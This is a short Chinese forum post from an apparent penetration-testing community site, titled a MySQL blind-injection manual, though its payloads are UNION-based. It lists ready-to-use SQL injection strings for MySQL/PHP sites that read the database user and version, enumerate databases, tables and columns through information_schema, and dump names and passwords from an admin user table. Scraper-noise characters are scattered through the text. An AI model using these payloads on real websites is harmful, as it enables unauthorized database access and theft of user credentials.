中国网络渗透测试联盟

标题: mysql盲注手册 [打印本页]
作者: admin    时间: 2012-9-13 16:27
标题: mysql盲注手册

# @- l, e/ t7 D3 E" R教程内容:Mysql 5+php 注入4 x: n6 k8 z+ ]
: E# ~; G* G/ w% h5 F
' c0 {$ L; K- d0 m. S% N0 @0 v( t

6 |  A1 k- r0 J' y: M4 w1 O% M一.查看MYSQL基本信息(库名,版本,用户)- \: _+ V- ~0 {2 f" \6 r
( r% E' f  M6 \: x$ N1 }# g
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
, a( T6 P6 Y; E9 P+ H+ H. r8 G1 E3 ~* v$ U& A' ]# p
二.查数据库/ f& s; d) R6 R) A8 s

( S3 Z" A/ G* k- A& {$ e6 |and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
, X$ B( S! A4 Dlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。0 ~: T3 e3 E1 d; ]) @7 @; y- Q

! o2 A& J% j0 \三.暴表
( C  U9 \/ M( P( V9 y/ ]# [2 }, m( m! C) l
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
/ \1 S* a: C; J% a% }0 ^2 i
' R% ^+ M: _  F( G: I. {  Dlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。  ?" P6 A* D* w
0 _1 l! l) `5 Y
四.暴字段
+ e8 J9 r5 A0 N* M2 j5 G8 Z+ c# l" P; e) v
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*- O6 q4 l" ~- W0 A9 F9 u

( i9 I$ H" ^7 P- S( }; J6 |0 ~8 a% U( flimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。2 J" p3 }# C) _# Z+ T4 k5 B
2 u4 D; D% s* P. G. s& a5 X
五.暴数据1 y% Q8 g" I2 \1 ]

0 }  {( D( ^& E& Band 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
" w: y3 M  G- s6 |3 W  H. x
7 ^0 r4 r! I7 `6 r8 Y0 Q
; G1 r' h: c6 n, i. G! C这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
  c& P# X( T0 k* X* @0 d" g



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2